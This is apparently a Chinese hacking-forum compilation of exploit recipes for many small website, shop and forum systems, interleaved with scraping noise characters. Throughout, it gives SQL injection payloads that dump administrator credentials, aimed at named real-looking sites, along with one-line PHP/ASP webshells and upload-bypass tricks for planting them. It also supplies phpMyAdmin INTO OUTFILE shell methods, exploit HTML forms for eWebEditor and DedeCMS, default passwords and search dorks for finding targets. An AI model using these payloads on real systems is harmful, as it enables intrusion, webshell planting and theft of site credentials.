启航企业建站系统 cookie注入漏洞通杀所有版本2 S' P( T; W m. z9 g
- A: B o( u* G5 }
直接上exploit:5 u+ K: g# D y+ y# E1 ]
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
6 [3 ^! p% G: A; X6 K- _test:http://www.tb11.net/system/xitong/shownews.asp?id=210) S1 A& H' N7 z9 K8 N) R6 i
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 y) t6 p. A# N# A* J, CAsprain论坛 注册用户 上传图片就可拿到webshell
1 E) S3 Q1 U; ^$ e$ r! U
# }5 Y1 ^' c* m$ A$ ^7 I7 ^" ^Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
4 m1 o$ h) t9 v! w+ a1.txt存放你的一句话马 如:<%execute(request("cmd"))%> P! X5 C8 E* O! X
2.gif 为一小图片文件,一定要小,比如qq表情图片
8 f# d% V% J& q& i9 L; h% R: E3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用) W3 u0 D% a1 `
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了3 X$ ?! U+ p$ }2 \( m; p% h/ m
5.q.asp;.gif
, m5 P G* |+ K5 @6 _7 ?; jgoogle:Powered by Asprain
+ y4 w0 q% P8 l/ Y--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' d! i- J$ X# _* ?% `+ J7 S3 W, t6 |3 G0 U: ?6 o* Q5 P
ShopNum1全部系统存在上传漏洞。- e8 h4 o1 U6 L& O$ C
( K( `: F0 V1 A# u7 t1 u
首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。3 I/ }1 n, Z$ o5 o: [1 l2 [
按说明 提示登录后台。。
0 P. b8 |# r: ? N. R5 T在后台功能页面->附件管理->附件列表
: F2 G5 ~1 a( P) v2 d4 Z可以直接上传.aspx 后缀木马
8 O+ j& u, R* |8 X: ~http://demo.shopnum1.com/upload/20110720083822500.aspx
+ }/ d8 A8 N* L7 j2 c' w--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ z) [% m* x/ ~" w$ f
4 e& _% M$ z- q _0 F) H8 v牛牛CMS中小企业网站管理系统 上传漏洞
' j6 U" F& V; n: d1 N y. t; W/ s7 p' i6 M& V9 d
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。; [; W2 }7 T4 U6 i. v, O6 A
后台:admin/login.asp/ r" c b: Q( S& f I* g) Y
ewebeditor 5.5 Nday
% u& h# _! O/ A/ b$ i+ @) Pexp:! U7 d8 k( F8 n# F T, T3 D# ]9 L# H
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
: {) c* k9 f% Y: n0 a( H<input?type=file?name=uploadfile?size=100><br><br>?
" N L+ |5 k" j- P+ l, }<input?type=submit?value=upload>?( n* n1 P6 J9 V+ m( b6 l2 P) l! P6 l/ |
</form>& S: J6 ~- F# N% E. y9 |
ps:先上传小马.
- } ~2 T8 i2 s, _! [" L9 |inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
, Q0 ?, \7 B5 c1 m4 W" E/ M
8 p0 c2 Y( [! a- |1 l--------------------------------------------------------------------------------------------------------------------------------------------------------------------------# S/ m! G! Q% B; }) @ o
- ?8 |5 E! c7 W3 M9 |5 M2 B4 |8 j
YothCMS 遍历目录漏洞
4 j0 k, ]6 S% x1 B7 r
6 P& M+ J( [9 H) L! W& |; c" I优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
- j) s t2 {* R) N默认后台:admin/login.asp
4 d- _8 D0 i7 W2 M" n遍历目录:
' `( Q9 J+ u0 B! F% Iewebeditor/manage/upload.asp?id=1&dir=../( t* \! O! M( i9 R
data:( o, K. @7 V1 l, q
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa$ ]+ H+ R/ i3 ]: m: v
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 M% q3 S' B$ M0 {
, }4 K3 q/ }3 P6 T) FNet112企业建站系统 1.0
7 p ~9 |4 C5 O/ C! c
. N$ q8 I0 l- ~源码简介:
8 V1 G( X' ]/ lNet112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。/ p7 m* X z) q3 D
添加管理员:
1 y2 z% p$ x0 L, Mhttp://www.0855.tv/admin/admin.asp?action=add&level=28 q5 s1 ^1 _$ Q6 l
其实加不加都不是很重要,后台文件都没怎么作验证。" f: i0 D- R& B* |2 p( M; B
上传路径:
5 ^. D4 q, N x) d( uhttp://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=2001 G* I8 m3 m3 ~2 {% r9 o/ d% T
http://www.0855.tv/inc/Upfile.asp?Stype=2" h0 e4 B; B5 k& Y
怎么利用自己研究。
/ e8 e$ T3 ~) b* r遍历目录:1 B5 C+ F2 B) K r8 J! N s
http://www.0855.tv/admin/upfile.asp?path=../..
6 x' d( M( f4 z/ z: @2 B; |5 @如:/ X' g, h2 m; ~- u; M) j, e" s4 i
http://www.0855.tv/admin/upfile.asp?path=../admin
: i4 ^, Y7 f5 C* J/ M: phttp://www.0855.tv/admin/upfile.asp?path=../data
8 E2 O7 `$ I% u+ Z--------------------------------------------------------------------------------------------------------------------------------------------------------------------------; o& W1 X o+ S/ q
/ j( ~1 S8 L7 O1 ~/ k3 D
易和阳光购物商城通杀 上传漏洞0 S! D! N6 ^7 }
6 O6 p$ j' v4 `5 l( K前提要求是IIS6.0+asp坏境。
" b- H* N% f7 P" m7 i漏洞文件Iheeo_upfile.asp * _0 e- s$ n& p+ w7 r8 ]4 m0 N
过滤不严.直接可以iis6.0上传% {4 ~% T7 f7 l& w
把ASP木马改成0855.asp;1.gif9 j! v% l6 C/ C6 V j7 i: }
直接放到明小子上传
- _, b% W/ {/ E5 y4 vGoogle搜索:inurl:product.asp?Iheeoid=
! l* Z8 b( W) Y: `4 W9 Z--------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ o8 X6 S1 c" D( h
5 n/ R. F5 {* |- g) ^
phpmyadmin后台4种拿shell方法
! S' M$ G; }$ A# \" s
& }1 D4 q5 s! o1 w# b* ?方法一:
# y i* N) r4 P# `CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );! V6 i0 o2 N4 F
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');/ Y; I, V5 J- Q% N- }
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';& H5 r; o( u6 K. G# Q8 \7 M
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php. b" U3 |3 Q, ?9 T4 n3 Y
一句话连接密码:xiaoma
+ p, U% V* a( V( a7 E方法二:
' P0 x+ L* r. {! z0 QCreate TABLE xiaoma (xiaoma1 text NOT NULL);9 x! F2 i( X5 R
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');5 e v; K& u+ e
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
* @+ q; ~# t0 S: VDrop TABLE IF EXISTS xiaoma;, B+ I# D7 l$ \$ F+ \ m
方法三:
: H% a; _% p4 }# T读取文件内容: select load_file('E:/xamp/www/s.php');
( P" E6 }* _7 R: U+ Z$ A写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
9 f0 Q/ ?! a* R! I/ j) Ycmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'0 W# b% t% W; S& ~, A
方法四:
, a: R$ Y4 W* e3 x8 z# z* Eselect load_file('E:/xamp/www/xiaoma.php');) \2 {! I4 _# m; j" \" c
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'6 G( d' y8 n' t* O
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir4 e& f1 I" H6 [! t- x) y
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 m# ?, p$ B3 w; {
" Q4 G" X: w- @) b传信网络独立开发网站源码0day漏洞
; k% `( J* M& N% \+ D. Q3 J
) E$ x. `0 y0 V# G( r后台system/login.asp
6 A- ]! |. c, S4 ?5 Q3 I/ Q进了后台有个ewebeditor
9 h5 x8 V2 }2 O4 e9 i) \" YGoogle 搜索inurl:product1.asp?tyc=) T3 C( a: e6 ]/ K6 t$ E- c
编辑器漏洞默认后台ubbcode/admin_login.asp* @' {4 e" }. g7 w) \
数据库ubbcode/db/ewebeditor.mdb3 Y# U+ T, S6 J( x7 @# D
默认账号密码yzm 111111
9 y# u1 Q; E7 c: c* ~+ m( m8 ?
拿webshell方法
3 I( O2 x" ]& L" C5 i* W登陆后台点击“样式管理”-选择新增样式
1 j+ x, } H- b8 X6 A8 O样式名称:scriptkiddies 随便写
- Q& w7 A3 }( K. Q, K5 U, Q路径模式:选择绝对路径
0 q4 g+ M7 |- o图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
6 q3 J! r! v, i图片类型比如就是我们要上传的ASP木马格式) u7 V3 e' \/ L2 t0 y; U7 ]3 }/ ]
上传路径:/, X9 |" A$ {9 M4 h0 H- R @$ z
图片限制:写上1000 免的上不了我们的asp木马, s5 } n( r3 R' K! x
上传内容不要写
0 }' e6 @4 O& A7 x) S; O4 J可以提交了
0 Z' ]' w, r/ e: l1 Q. P样式增加成功!
/ k& D: { [1 s返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 7 G7 L5 k0 U- P9 j
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
; m" ~( d8 Z# A) E1 ]/ d网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
" P( W H* g6 U2 e3 \4 u. L! x上ASP木马 回车 等到路径- l$ M7 K0 s# t- U5 ?% ~$ u
: J4 W+ y J2 R6 C' b# p* \
后台:system/login.asp
, `5 r/ m' S2 DExp:
1 @' A q" R j, Pand 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master/ ~+ R5 N( r4 Y- `' l) F7 x
测试:: m# P. ^) z$ y3 L+ _
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
& f- C9 [' V/ n l* r' m( ?% G$ d. Bhttp://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
" W; Y o& p/ R7 U8 I1 _! [--------------------------------------------------------------------------------------------------------------------------------------------------------------------------, U" j+ B) G0 X/ s- U
" H, z$ n6 y6 K7 Y hfoosun 0day 最新注入漏洞
; q5 \8 J V# c# U0 O9 C6 v
1 P$ I5 V/ x& {漏洞文件:www.xxx.com/user/SetNextOptions.asp
; s4 C9 ^0 Z7 A! x1 D3 }# _利用简单的方法:
6 u( T+ N! Z" I3 y暴管理员帐号:- [; \. x7 b1 Z: X
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin; e& o% X2 H2 I% p2 G
暴管理员密码:
" z* V5 w* S: G8 B* Nhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,
7 G) Z. v( c/ Y W0 S) G--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! I/ _2 i5 v0 l& Z8 H$ p3 ?) w' i. f- ?9 c" r% I1 B3 b' r
网站程序的版权未知!( p- E5 f1 M x1 Y# C
0 m: R8 Z! A4 R
默认网站数据库:
" r% W- o4 J. gwww.i0day.com/data/nxnews.mdb( r' ] t3 Y3 d6 c0 Y/ u
ewebeditor 在线编辑器:
% n2 u: x" l$ F( t5 q编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb0 O9 c; p/ ?% v( m
登录地址:ewebeditor/admin_login.asp
6 z) J' x) R0 H0 w) Q0 C默认密码:admin admin% Q4 C- R1 k, h6 M" E
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
( ?+ }" a4 v9 A- ~5 U+ X9 p' }: V/ ^" J9 P
Sql注入漏洞:2 i7 ?$ G. @9 x9 ?
http://www.i0day.com/detail.asp?id=120 S" `/ Y4 s( O( y* h% E& v
exp:
5 O' s; l2 H% v& ^union select 1,admin,password,4,5,6,7,8 from admin. L, x) }1 q q: w& j& r
爆出明文帐号/密码3 M, r" y0 e( P$ I" x0 N4 q: ~2 W
2 j8 X6 m( O1 L( |4 L0 ~' v; B+ |上传漏洞:- S3 I6 _0 X; |$ K5 a. \/ y
后台+upfile.asp
) n5 Y [8 {, O5 Y9 H7 N: N如:
/ W/ o+ N& H/ u, R# L) y! Y# v: \8 `http://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
$ R2 ?; J. b" Y9 j4 @4 ishell的地址:网址+后台+成功上传的马
3 t# h; { Z1 Z4 ~5 C2 ]' ugoogle:inurl:news.asp?lanmuName=( f; b# H0 {7 g/ k9 _- h& F& O
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" l1 Q% m- k1 ]% l1 Y" c: y" g5 a/ u9 P6 T9 X6 e+ \ v+ f
dedecms最新0day利用不进后台直接拿WEBSHELL* r. W$ |7 M8 Z8 o
: [: n& j L) q2 I, C# P- j
拿webshell的方法如下:6 Q) ~6 W& Q) s
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
3 q- g% t/ _$ A前题条件,必须准备好自己的dede数据库,然后插入数据:
* ?" R( b$ G# R8 @' i: g1 Ninsert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); " o1 d" W B7 r: W8 y
* |/ l8 L7 @, }
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
1 I. g. k7 T8 ]8 k% s0 [+ n<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
" o D* G% ]+ ?6 `1 P<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
. J8 f: ~/ f, h. }7 M$ \<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />8 ?( L/ x; e2 r( A: ?& m$ {
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
7 a! h3 V8 o. E! \/ m; {<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />" H. p& {! S o: b- `
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />1 J& d; P0 N8 e! S$ @
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />7 b: p7 i2 w- t5 a) p5 E* C
<input type="text" value="true" name="nocache" style="width:400">
. ~9 ?" ^& {& I% n' w& K<input type="submit" value="提交" name="QuickSearchBtn"><br />
$ x- A# e4 Z( l. r* Z8 @# u. D/ }& r</form>
- h7 Z& s! a; D, |+ t6 j<script>
1 V d3 h: J* f4 f% @7 J5 vfunction addaction()
1 H7 Q3 `/ W5 X3 d8 W" f{
/ n: o- s/ n3 J" |5 V, sdocument.QuickSearch.action=document.QuickSearch.doaction.value;
% V6 F) L# m) q8 b& \7 d3 V}3 C+ ^- J S8 v. i
</script>
J* l3 ]. ~+ ~9 I% X-----------------------------------------------------------------------------------------------------------------------------------------------
" F/ A8 f; G! \7 T D% b7 Y
3 ?' x4 H) N1 Y- N; j, \dedecms织梦暴最新严重0day漏洞. M+ F9 Q: w( k; l6 d: |, W
bug被利用步骤如下:
% P& f: I0 H- M" g: Q1 z2 b% F- s7 @http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
7 S0 x5 U! [. ~ G把上面{}上的字母改为当前的验证码,即可直接进入网站后台。" B" V/ A* s" X& T, |" x$ {
-------------------------------------------------------------------------------------------------------------------------------------------
i9 c% c% L8 O1 C
% |. [3 N( E7 `( d) Y多多淘宝客程序上传漏洞 ) v' S1 t3 ? i% W- Q
漏洞页面:
# a1 e) s' O: ?admin\upload_pic.php
) @% t% O$ e& h3 |7 G传送门:
# f- R$ ^) }, Ohttp://www.www.com/admin/upload_pic.php?uploadtext=slide1$ _3 Z- s$ ^% y5 k8 N; N/ a: }
PS:copy张图片马 直接 xxx.php 上传抓包地址!
2 K+ V8 a9 d, v/ ]( s/ s" ?------------------------------------------------------------------------------------------------------------------------------------------------------
! `5 w$ \6 e F, Z/ k. p3 x
/ e+ q0 t% C4 d U0 m& ^. S) x3 j无忧公司系统ASP专业版后台上传漏洞
. \4 Q- D: M9 _7 @* O4 J4 S/ X漏洞文件 后台上传
3 q! e& b9 z$ E/ Qadmin/uploadPic.asp
. N3 v: |! l0 k1 A' t8 o漏洞利用 这个漏洞好像是雷池的# ?+ n; k3 Q# @3 F' o- \+ x
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1
: }# z( \3 D. I. w8 D$ h4 ^' j$ ?等到的webshell路径:
; ^. n7 L6 t) Z. ]) w/UploadFiles/scriptkiddies.asp;_2.gif
; O& y# a: K$ Y$ q+ v---------------------------------------------------------------------------------------------------------------------------------------------------
5 f+ K! |. ?0 [- S" } l
z; P9 y7 [& G5 M/ j9 p" ^" F住哪酒店分销联盟系统2010
1 d# k2 M! W+ ?+ SSearch:8 v9 r6 R' ^) j: X* G. R3 Z# I
inurl:index.php?m=hotelinfo6 w; ^0 M2 g. p" k& A `
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
, }& I8 u& Z4 E" ~9 I6 ~. t1 \默认后台:index.php?m=admin/login
7 @5 v; Z$ Q2 A1 f) K--------------------------------------------------------------------------------------------------------------------------------------------------; [: c7 ]9 p4 ]. X ~
: M( e Q- r5 B# V+ ^
inurl:info_Print.asp?ArticleID=$ l. o2 l% a% v& L
后台 ad_login.asp
/ r( {# J" S# }+ \) O2 N爆管理员密码:# O" T- D1 a* ~
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin- L- \) J. @; S0 F8 h. ]8 D
------------------------------------------------------------------------------------------------------------------------------------------------------------+ F! H* {# m! a9 K \
6 y; U' T' Y5 J! p( q1 [( q搜索框漏洞!
, v. g _( |- g" [7 @% U0 n%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
. D+ I& o1 W& ~% t--------------------------------------------------------------------------------------------------------------------------------------------------------
0 {) _ Y: w! |0 u$ l7 D) s$ P0 s7 S0 k4 M7 n1 M
关键字:
. N% L/ m: a; }& u, yinurl:/reg_TemletSel.asp?step=2
9 N2 J l1 J9 y; A! e# C+ H或者
" R5 [# R& L( ]+ @' n0 b1 G K电子商务自助建站--您理想的助手" B& U! j8 ~, v( ~$ \1 M& B! M
-------------------------------------------------------------------------------------------------------------------------------------------------( P% v; b" w! S: H: j. c0 K8 r
, T/ u0 r7 C# s/ S1 S, U2 \5 H
iGiveTest 2.1.0注入漏洞1 O5 G. Q/ R5 B: g* R
Version: <= 2.1.0
2 |' O! y c: e6 K5 B& q# Homepage: http://iGiveTest.com/
7 W) ^& w$ Y; X* b! O- j谷歌关键字: “Powered by iGiveTest”
* v' J6 P8 R/ [6 `随便注册一个帐号。然后暴管理员帐号和密码
/ }) Q: y# J! f. shttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
4 o5 [# m8 a" y {2 ]6 ?- j7 {------------------------------------------------------------------------------------------------------------------------------------------------
! B' p4 A/ X1 b9 H3 c. |/ z3 I. g% K& u( E" M: E
CKXP网上书店注入漏洞
) E+ [% f: w2 G+ n9 D% B# A& @工具加表:shop_admin 加字段:admin
u2 Y# t5 [; Z/ a( d! m+ Z& d ~* ~后台:admin/login.asp
# F- y4 C/ n4 e8 i* Q登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=// ~* t& [, I9 e8 e
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息/ w1 g( J' ^# e9 F' @6 H! O; M
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 s, G4 ^) F. m. g2 _
7 s/ j& M) d" C) N& k' t" |段富超个人网站系统留言本写马漏洞7 c2 x! _, }, N+ @5 b( i
源码下载:http://www.mycodes.net/24/2149.htm7 M, x; u+ a8 l- E* C: N
addgbook.asp 提交一句话。
9 M) {* m+ }( b$ e& V连接: http://www.xxxx.tv/date/date3f.asp
8 V$ R8 c$ K, f& b- [google:为防批量,特略!2 h' e2 d* v; C2 U$ S6 S( v
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 A/ M( S0 p" T% O8 D" v: C$ E; F/ L4 i
智有道专业旅游系统v1.0 注入及列目录漏洞
% y' n! c- ` K* Z K默认后台路径:/admin/login.asp5 i( I, x7 W3 E. B- ^0 Z' J
默认管理员:admin/ w+ v* @$ O' {+ }% d
默认密码:123456
: k9 u$ U7 v$ ]7 ~! i ?1 v0 iSQL EXP Tset:% Z$ j5 O9 ~' ^! l( u( I
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin1 W. s& J; o& u5 ?/ q* c
------------------------------------------------------------------------------------------------------------------------------------------------------------------------; ]9 X5 b6 n% }4 x- z" U
5 w8 t: `$ P9 e7 Y& d$ G
ewebeditor(PHP) Ver 3.8 本任意文件上传0day# U( t( |0 {1 V, }5 j
EXP:
6 p% D. ^, l, ~2 b! G5 b<title>eWebeditoR3.8 for php任意文件上EXP</title>. f! q" ~6 b* q: @9 e
<form action="" method=post enctype="multip. r7 K( u% }# r' L2 L% G3 z
art/form-data"> J0 P) |: C" U+ ~3 @0 N
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> ; m( O# [+ E! A) o& w
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
) t% s& v. c* ^6 o5 n- w<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> & d! B3 S+ h( E7 q3 _) \" G( Y2 _
file:<input type=file name="uploadfile"><br> e" }' A2 r6 e7 x' X
<input type=button value=submit onclick=fsubmit()>
# T5 [8 }; E3 ], M" k</form><br>
. w; L5 G9 d- d* b<script> 7 t4 s, g6 Z9 h% K1 D
function fsubmit(){
h* I8 d+ K0 e! S1 z; {% X$ {form = document.forms[0]; 7 Y9 g2 r- p! D" x8 j: A0 j
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; * p |2 l6 _% ^9 L
alert(form.action); 4 _& r+ s, ~, h8 w7 {- O4 n
form.submit(); 6 w8 B, A2 C( Q# ?' l- t7 r& F/ V: g
}
j* k/ |( y( `8 `</script>* b& a+ ~1 z4 b6 s3 r* Y
注意修改里面ewebeditor的名称还有路径。
$ n/ [ F! q4 M3 X7 k% a3 h---------------------------------------------------------------------------------------------------------------------------------------------------------------------------' F% k( w/ _* K) N; X& G
6 ~" G) i3 t) Y提交’时提示ip被记录 防注入系统的利用
* l6 h. Y9 v% s- s) s! `9 |网址:http://www.xxx.com/newslist.asp?id=122′
, h) h4 N4 a6 ?. y/ c( @提示“你的操作已被记录!”等信息。6 Z% s" L8 ]2 Z# p
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。* t! N- w# H+ {7 a C+ Q) n
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------; w8 l" Y6 u+ [9 y3 I; { C
7 [( {, H- k8 s2 t1 D2 T8 P
西部商务网站管理系统 批量拿shell-0day
% |3 }' F! P$ o1 R' W9 x, Q这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb / Q4 ]/ R3 k% t) P
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛" v [' |" ^" l
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合2 S) u# H7 g) s( G+ ~/ [' w
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂4 P( l' \: v( Q4 p3 B
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------/ k) g x) S: ]1 j7 J- F( i
& C/ F9 ]. w; B, O) ?' J: hJspRun!6.0 论坛管理后台注入漏洞
4 x+ w: b; h F
- ]1 ?3 q: D7 vSEBUG-ID:20787 发布时间:2011-04-30 影响版本:
, o; }' N- B2 M% L$ G5 x% h' H# QJspRun!6.0 / y; [8 r; o$ V$ W# l' L$ @
漏洞描述:
) H4 A% ?" o% W) _& f0 PJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。1 N- G: F- N0 p" r/ Q! A: m3 J
在处理后台提交的文件中ForumManageAction.java第1940行" q- l2 ]! A% P( R( p
String export = request.getParameter("export");//直接获取,没有安全过滤
1 {# E! i) Y* q0 k. I) t* rif(export!=null){, [4 o; B0 ^1 [9 k* B
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
; i" E+ a7 H! w, qif(styles==null||styles.size()==0){# h- H% q+ B; b7 }; O7 E
<*参考
% v/ a$ N2 b# }) U4 l2 Jnuanfan@gmail.com5 ~; F& I; @1 r9 o4 x3 i
*> SEBUG安全建议:3 q( o b; p5 T; g
www.jsprun.net
& O) `3 M+ ^( ]4 W" z+ ~) Y* n(1)安全过滤变量export
$ Y* D1 ^! r) e* N Q0 S(2)在查询语句中使用占位符
& Y% j2 q, P# \1 n------------------------------------------------------------------------------------------------------------------------------------------------------------------------------" o: U# n" z/ b/ M5 r. j4 Q
9 U( W! I' e% x% _, L+ G, G乌邦图企业网站系统 cookies 注入1 S7 U; X: o2 s) y* d. d" b
; \, p, ?$ W6 F/ A8 @
程序完整登陆后台:/admin/login.asp
) z8 x; n" G" ?+ y. A8 `) }5 g默认登陆帐号:admin 密码:admin8888 T' J" N, ?5 _* W7 I
语句:(前面加个空格)
' ~! ?$ w6 A& _( ~- w/ Nand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
, u; ~$ b; Z6 A0 Q3 D+ u, n( X或者是16个字段:9 V; g+ v g& v0 `
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
- P( P3 R; ]! o爆不出来自己猜字段。
: ?/ k9 c9 \: c' X* x3 s8 `注入点:http://www.untnt.com/shownews.asp?=88; F. n, w$ |" w1 ?' z
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp% f: k+ l, L3 B1 y9 J/ m
关键字:
1 @- V: V( K' V; ~0 m* `+ \5 {& Xinurl:shownews?asp.id=$ j1 _' R% F% v0 R N& F
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
' o$ }' |$ E; a% d! K _+ Y1 \4 c$ j
( i, i9 z; b1 R7 K4 u ]! o) UCKXP网上书店注入漏洞
) I# N$ a/ N+ R& q* ^/ L
5 X& T# Z" V; T/ Y% `/ F a0 U工具加表:shop_admin 加字段:admin0 a: x. \' t, [- U0 }/ s; M
后台:admin/login.asp 7 C8 R+ o2 c* u
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/+ H) m/ z9 e. c G: j2 X
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息' D6 J' ?6 [9 ~4 {
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) l; R2 ~8 i0 \" G, z7 N8 U6 K3 i: b. s4 x9 f2 I0 e" m0 j `$ l
YxShop易想购物商城4.7.1版本任意文件上传漏洞
. y( g/ Z% G- g# m2 o
8 H+ Z! H& z! D4 t6 |, H" Z9 T# Bhttp://xxoo.com/controls/fckedit ... aspx/connector.aspx
5 @5 i& @6 q& l% R! b跳转到网站根目录上传任意文件。
